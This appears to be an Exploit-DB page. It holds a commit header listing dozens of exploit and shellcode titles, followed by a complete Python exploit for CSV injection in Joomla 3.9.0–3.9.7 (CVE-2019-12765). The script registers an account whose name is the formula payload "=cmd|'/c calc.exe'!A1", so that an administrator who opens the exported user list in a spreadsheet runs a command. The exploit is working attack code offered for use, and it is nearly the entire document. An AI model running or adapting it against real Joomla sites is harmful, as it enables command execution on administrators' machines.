1979df6cb3
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
43 lines
No EOL
1.5 KiB
Python
43 lines
No EOL
1.5 KiB
Python
#!/usr/bin/python3
|
|
|
|
# Exploit Title: Joomla 3.9.0 < 3.9.7 - CSV Injection
|
|
# Date: 2020-03-10
|
|
# Vulnerability Authors: Jose Antonio Rodriguez Garcia and Phil Keeble (MWR InfoSecurity)
|
|
# Exploit Author: Abdullah - @i4bdullah
|
|
# Vendor Homepage: https://www.joomla.org/
|
|
# Software Link: https://downloads.joomla.org/cms/joomla3/3-9-5/Joomla_3-9-5-Stable-Full_Package.zip?format=zip
|
|
# Version: 3.9.0 < 3.9.7
|
|
# Tested on: Ubuntu 18.04 LTS and Windows 7
|
|
# CVE : CVE-2019-12765
|
|
|
|
import mechanize
|
|
import sys
|
|
|
|
if (len(sys.argv) != 2):
|
|
print(f'Usage: {sys.argv[0]} <Base URL>')
|
|
print(f'Example: {sys.argv[0]} http://127.0.0.1 ')
|
|
sys.exit(1)
|
|
|
|
base_url = sys.argv[1]
|
|
reg_url = f"{base_url}/joomla/index.php/component/users/?view=registration&Itemid=101"
|
|
login_url = f"{base_url}/joomla/index.php?option=com_users"
|
|
|
|
def pwn(username='abdullah'):
|
|
payload = "=cmd|'/c calc.exe'!A1"
|
|
print(f"Registering a new user with the name <{payload}>...")
|
|
reg_form = mechanize.Browser()
|
|
reg_form.set_handle_robots(False)
|
|
reg_form.open(reg_url)
|
|
reg_form.select_form(nr=0)
|
|
reg_form.form['jform[name]'] = payload
|
|
reg_form.form['jform[username]'] = username
|
|
reg_form.form['jform[password1]'] = 'password'
|
|
reg_form.form['jform[password2]'] = 'password'
|
|
reg_form.form['jform[email1]'] = 'whatever@i4bdullah.com'
|
|
reg_form.form['jform[email2]'] = 'whatever@i4bdullah.com'
|
|
reg_form.submit()
|
|
print("The exploit ran successfully.")
|
|
print("Exiting...")
|
|
sys.exit(0)
|
|
|
|
pwn() |